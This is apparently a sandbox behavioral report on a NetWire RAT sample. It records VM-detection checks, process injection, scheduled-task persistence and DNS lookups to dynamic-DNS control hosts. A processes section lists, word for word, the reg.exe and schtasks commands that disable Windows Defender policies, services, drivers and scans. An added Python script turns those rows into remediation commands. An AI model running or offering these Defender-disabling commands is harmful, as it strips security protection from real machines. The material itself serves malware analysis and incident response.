Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" C:\Windows\system32\reg.exe N/A

NetWire RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Netwire

botnet stealer netwire

Netwire family

netwire

Looks for VirtualBox Guest Additions in registry

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Oracle\VirtualBox Guest Additions C:\Users\Admin\AppData\Roaming\YrtbHB5Gfq2BVO9.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Oracle\VirtualBox Guest Additions C:\Users\Admin\AppData\Roaming\ROJid3crwtijBOi.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Oracle\VirtualBox Guest Additions C:\Users\Admin\AppData\Roaming\ZeXD3PhMCqyv9oV.exe N/A

Looks for VMWare Tools registry key

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\VMware, Inc.\VMware Tools C:\Users\Admin\AppData\Roaming\YrtbHB5Gfq2BVO9.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\VMware, Inc.\VMware Tools C:\Users\Admin\AppData\Roaming\ROJid3crwtijBOi.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\VMware, Inc.\VMware Tools C:\Users\Admin\AppData\Roaming\ZeXD3PhMCqyv9oV.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Roaming\ZeXD3PhMCqyv9oV.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Roaming\ROJid3crwtijBOi.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Roaming\YrtbHB5Gfq2BVO9.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Roaming\YrtbHB5Gfq2BVO9.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Roaming\ROJid3crwtijBOi.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Roaming\ZeXD3PhMCqyv9oV.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\2025-04-20_2a26ed689a49e2b3cfd71901147f8303_black-basta_cova_cryptbot_elex_hawkeye_luca-stealer.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\ROJid3crwtijBOi.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\YrtbHB5Gfq2BVO9.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\ZeXD3PhMCqyv9oV.exe N/A

Maps connected drives based on registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 C:\Users\Admin\AppData\Roaming\ZeXD3PhMCqyv9oV.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\Users\Admin\AppData\Roaming\ROJid3crwtijBOi.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 C:\Users\Admin\AppData\Roaming\ROJid3crwtijBOi.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\Users\Admin\AppData\Roaming\YrtbHB5Gfq2BVO9.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 C:\Users\Admin\AppData\Roaming\YrtbHB5Gfq2BVO9.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\Users\Admin\AppData\Roaming\ZeXD3PhMCqyv9oV.exe N/A

Modifies Security services

defense_evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdBoot\Start = "4" C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdFilter\Start = "4" C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisDrv\Start = "4" C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisSvc\Start = "4" C:\Windows\system32\reg.exe N/A
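The Set value rows in the three tables above are the registry writes that actually landed in this detonation, and they are also the list of what an incident responder has to undo: the policy values should not exist on a clean host, and Start=4 leaves the Defender service and its drivers disabled until the value is restored and the machine rebooted. The script below is an added example, not sandbox code, that turns such rows into a checklist of reg.exe commands. It assumes the sandbox's \REGISTRY\MACHINE\ prefix maps to HKLM, that ControlSet001 was the active control set (on a real host check HKLM\SYSTEM\Select\Current), and that the DEFAULT_START table reflects a stock Windows 10/11 image; verify both against a clean reference before running anything it prints.

```python
r"""Turn the report's 'Set value (int)' rows into a remediation checklist.

Added example for this report, not sandbox code. Assumptions: \REGISTRY\MACHINE
maps to HKLM, ControlSet001 was the active control set, and DEFAULT_START
holds stock Windows 10/11 values (verify against a clean reference image).
"""
import re

ROW_RE = re.compile(r'^Set value \(int\) (?P<path>\\REGISTRY\\.+?) = "(?P<data>\d+)"')

# Assumed default Start values for the Defender services and drivers
# (2 = automatic, 3 = manual/demand, 0 = boot start); 4 means disabled.
DEFAULT_START = {"WinDefend": 2, "WdNisSvc": 3, "WdFilter": 0, "WdBoot": 0, "WdNisDrv": 3}
POLICY_ROOT = r"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender"

# Constructed sample: rows copied from the behavioral1 signature tables above.
SAMPLE_ROWS = [
    r'Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" C:\Windows\system32\reg.exe N/A',
    r'Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Windows\system32\reg.exe N/A',
    r'Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" C:\Windows\system32\reg.exe N/A',
    r'Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdFilter\Start = "4" C:\Windows\system32\reg.exe N/A',
]


def to_hive_path(sandbox_path):
    r"""\REGISTRY\MACHINE\... -> HKLM\..., and ControlSet001 -> CurrentControlSet."""
    p = sandbox_path
    prefix = "\\REGISTRY\\MACHINE\\"
    if p.upper().startswith(prefix):
        p = "HKLM\\" + p[len(prefix):]
    return re.sub(r"\\ControlSet001\\", r"\\CurrentControlSet\\", p, flags=re.IGNORECASE)


def parse_rows(rows):
    """(key, value name, observed data) for each 'Set value (int)' row; other rows are skipped."""
    out = []
    for row in rows:
        m = ROW_RE.match(row)
        if not m:
            continue
        key, name = to_hive_path(m["path"]).rsplit("\\", 1)
        out.append((key, name, int(m["data"])))
    return out


def remediation(rows):
    """One (reason, reg.exe command) per tampered value.

    Policy values are deleted because a clean host has none; a service or
    driver Start=4 is restored to its assumed default from DEFAULT_START.
    """
    actions = []
    for key, name, data in parse_rows(rows):
        if key.upper().startswith(POLICY_ROOT.upper()):
            actions.append(("Defender policy override %s=%d" % (name, data),
                            'reg delete "%s" /v "%s" /f' % (key, name)))
        elif name.lower() == "start" and data == 4:
            svc = key.rsplit("\\", 1)[-1]
            if svc in DEFAULT_START:
                actions.append(("%s disabled (Start=4)" % svc,
                                'reg add "%s" /v Start /t REG_DWORD /d %d /f'
                                % (key, DEFAULT_START[svc])))
    return actions


if __name__ == "__main__":
    for reason, cmd in remediation(SAMPLE_ROWS):
        print("%-45s %s" % (reason, cmd))
```

The rows for WdBoot, WdNisDrv and WdNisSvc in the table above feed the same function; a reboot is still needed after restoring the boot-start drivers, and Defender's own status (for example the output of Get-MpComputerStatus) should be checked afterwards rather than trusting the registry alone.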

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\2025-04-20_2a26ed689a49e2b3cfd71901147f8303_black-basta_cova_cryptbot_elex_hawkeye_luca-stealer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\ROJid3crwtijBOi.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\WinDriversQt.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\nb662-full.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\YrtbHB5Gfq2BVO9.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\ZeXD3PhMCqyv9oV.exe N/A

NSIS installer

installer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Roaming\nb662-full.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Users\Admin\AppData\Roaming\nb662-full.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\ZeXD3PhMCqyv9oV.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\YrtbHB5Gfq2BVO9.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\ROJid3crwtijBOi.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\WinDriversQt.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2284 wrote to memory of 4004 N/A C:\Users\Admin\AppData\Local\Temp\2025-04-20_2a26ed689a49e2b3cfd71901147f8303_black-basta_cova_cryptbot_elex_hawkeye_luca-stealer.exe C:\Users\Admin\AppData\Roaming\WinDriversQt.exe
PID 2284 wrote to memory of 4004 N/A C:\Users\Admin\AppData\Local\Temp\2025-04-20_2a26ed689a49e2b3cfd71901147f8303_black-basta_cova_cryptbot_elex_hawkeye_luca-stealer.exe C:\Users\Admin\AppData\Roaming\WinDriversQt.exe
PID 2284 wrote to memory of 4004 N/A C:\Users\Admin\AppData\Local\Temp\2025-04-20_2a26ed689a49e2b3cfd71901147f8303_black-basta_cova_cryptbot_elex_hawkeye_luca-stealer.exe C:\Users\Admin\AppData\Roaming\WinDriversQt.exe
PID 2284 wrote to memory of 4336 N/A C:\Users\Admin\AppData\Local\Temp\2025-04-20_2a26ed689a49e2b3cfd71901147f8303_black-basta_cova_cryptbot_elex_hawkeye_luca-stealer.exe C:\Users\Admin\AppData\Roaming\ROJid3crwtijBOi.exe
PID 2284 wrote to memory of 4336 N/A C:\Users\Admin\AppData\Local\Temp\2025-04-20_2a26ed689a49e2b3cfd71901147f8303_black-basta_cova_cryptbot_elex_hawkeye_luca-stealer.exe C:\Users\Admin\AppData\Roaming\ROJid3crwtijBOi.exe
PID 2284 wrote to memory of 4336 N/A C:\Users\Admin\AppData\Local\Temp\2025-04-20_2a26ed689a49e2b3cfd71901147f8303_black-basta_cova_cryptbot_elex_hawkeye_luca-stealer.exe C:\Users\Admin\AppData\Roaming\ROJid3crwtijBOi.exe
PID 2284 wrote to memory of 1080 N/A C:\Users\Admin\AppData\Local\Temp\2025-04-20_2a26ed689a49e2b3cfd71901147f8303_black-basta_cova_cryptbot_elex_hawkeye_luca-stealer.exe C:\Users\Admin\AppData\Roaming\YrtbHB5Gfq2BVO9.exe
PID 2284 wrote to memory of 1080 N/A C:\Users\Admin\AppData\Local\Temp\2025-04-20_2a26ed689a49e2b3cfd71901147f8303_black-basta_cova_cryptbot_elex_hawkeye_luca-stealer.exe C:\Users\Admin\AppData\Roaming\YrtbHB5Gfq2BVO9.exe
PID 2284 wrote to memory of 4508 N/A C:\Users\Admin\AppData\Local\Temp\2025-04-20_2a26ed689a49e2b3cfd71901147f8303_black-basta_cova_cryptbot_elex_hawkeye_luca-stealer.exe C:\Users\Admin\AppData\Roaming\ZeXD3PhMCqyv9oV.exe
PID 4004 wrote to memory of 4684 N/A C:\Users\Admin\AppData\Roaming\WinDriversQt.exe C:\Windows\system32\cmd.exe
PID 2284 wrote to memory of 4672 N/A C:\Users\Admin\AppData\Local\Temp\2025-04-20_2a26ed689a49e2b3cfd71901147f8303_black-basta_cova_cryptbot_elex_hawkeye_luca-stealer.exe C:\Users\Admin\AppData\Roaming\nb662-full.exe
PID 4684 wrote to memory of 4560 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4684 wrote to memory of 4764 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4684 wrote to memory of 1728 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4684 wrote to memory of 3840 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4684 wrote to memory of 1092 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4684 wrote to memory of 6096 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4684 wrote to memory of 5288 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4684 wrote to memory of 4388 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4684 wrote to memory of 6072 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4684 wrote to memory of 536 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4684 wrote to memory of 1572 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4684 wrote to memory of 1308 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4684 wrote to memory of 4312 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4684 wrote to memory of 5456 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4684 wrote to memory of 1356 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4684 wrote to memory of 5932 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 4684 wrote to memory of 4688 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 4684 wrote to memory of 5220 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 4684 wrote to memory of 728 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 4684 wrote to memory of 3748 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 4684 wrote to memory of 944 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4684 wrote to memory of 3680 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4684 wrote to memory of 5376 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4684 wrote to memory of 3240 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\2025-04-20_2a26ed689a49e2b3cfd71901147f8303_black-basta_cova_cryptbot_elex_hawkeye_luca-stealer.exe

"C:\Users\Admin\AppData\Local\Temp\2025-04-20_2a26ed689a49e2b3cfd71901147f8303_black-basta_cova_cryptbot_elex_hawkeye_luca-stealer.exe"

C:\Users\Admin\AppData\Roaming\WinDriversQt.exe

"C:\Users\Admin\AppData\Roaming\WinDriversQt.exe"

C:\Users\Admin\AppData\Roaming\ROJid3crwtijBOi.exe

"C:\Users\Admin\AppData\Roaming\ROJid3crwtijBOi.exe"

C:\Users\Admin\AppData\Roaming\YrtbHB5Gfq2BVO9.exe

"C:\Users\Admin\AppData\Roaming\YrtbHB5Gfq2BVO9.exe"

C:\Users\Admin\AppData\Roaming\ZeXD3PhMCqyv9oV.exe

"C:\Users\Admin\AppData\Roaming\ZeXD3PhMCqyv9oV.exe"

C:\Users\Admin\AppData\Roaming\nb662-full.exe

"C:\Users\Admin\AppData\Roaming\nb662-full.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\9A4C.tmp\9A4D.tmp\9A4E.bat C:\Users\Admin\AppData\Roaming\WinDriversQt.exe"

C:\Windows\system32\reg.exe

reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable

C:\Windows\system32\reg.exe

reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f

C:\Windows\system32\reg.exe

reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f

C:\Windows\system32\reg.exe

reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SDgtKxxeaGYFg" /XML "C:\Users\Admin\AppData\Local\Temp\tmp69B3.tmp"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\DiFGHpZsWh" /XML "C:\Users\Admin\AppData\Local\Temp\tmp69B2.tmp"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\yBrhLIdmRX" /XML "C:\Users\Admin\AppData\Local\Temp\tmp69F0.tmp"

C:\Users\Admin\AppData\Roaming\YrtbHB5Gfq2BVO9.exe

"{path}"

C:\Users\Admin\AppData\Roaming\ZeXD3PhMCqyv9oV.exe

"{path}"

C:\Users\Admin\AppData\Roaming\ROJid3crwtijBOi.exe

"{path}"

C:\Users\Admin\AppData\Roaming\ZeXD3PhMCqyv9oV.exe

"{path}"

Network

Country Destination Domain Proto
US 8.8.8.8:53 victoire.dyndns.biz udp
US 8.8.8.8:53 maelus.mine.nu udp
US 8.8.8.8:53 c.pki.goog udp
NL 173.194.69.94:80 c.pki.goog tcp
US 8.8.8.8:53 maelus.mine.nu udp
US 8.8.8.8:53 victoire.dyndns.biz udp

Files

C:\Users\Admin\AppData\Roaming\WinDriversQt.exe

C:\Users\Admin\AppData\Roaming\ROJid3crwtijBOi.exe

C:\Users\Admin\AppData\Roaming\YrtbHB5Gfq2BVO9.exe

C:\Users\Admin\AppData\Roaming\ZeXD3PhMCqyv9oV.exe

C:\Users\Admin\AppData\Roaming\nb662-full.exe

C:\Users\Admin\AppData\Local\Temp\9A4C.tmp\9A4D.tmp\9A4E.bat

C:\Users\Admin\AppData\Local\Temp\nso9CDD.tmp\LangDLL.dll

C:\Users\Admin\AppData\Local\Temp\nso9CDD.tmp\System.dll

C:\Users\Admin\AppData\Local\Temp\nso9CDD.tmp\UserInfo.dll

C:\Users\Admin\AppData\Local\Temp\nso9CDD.tmp\cpudesc.dll

C:\Users\Admin\AppData\Local\Temp\nso9CDD.tmp\nsDialogs.dll

C:\Users\Admin\AppData\Local\Temp\nso9CDD.tmp\UAC.dll

C:\Users\Admin\AppData\Local\Temp\nso9CDD.tmp\GetFLE.ini

C:\Users\Admin\AppData\Local\Temp\nso9CDD.tmp\InstallOptions.dll

C:\Users\Admin\AppData\Local\Temp\tmp69B2.tmp

C:\Users\Admin\AppData\Local\Temp\tmp69B3.tmp

C:\Users\Admin\AppData\Local\Temp\tmp69F0.tmp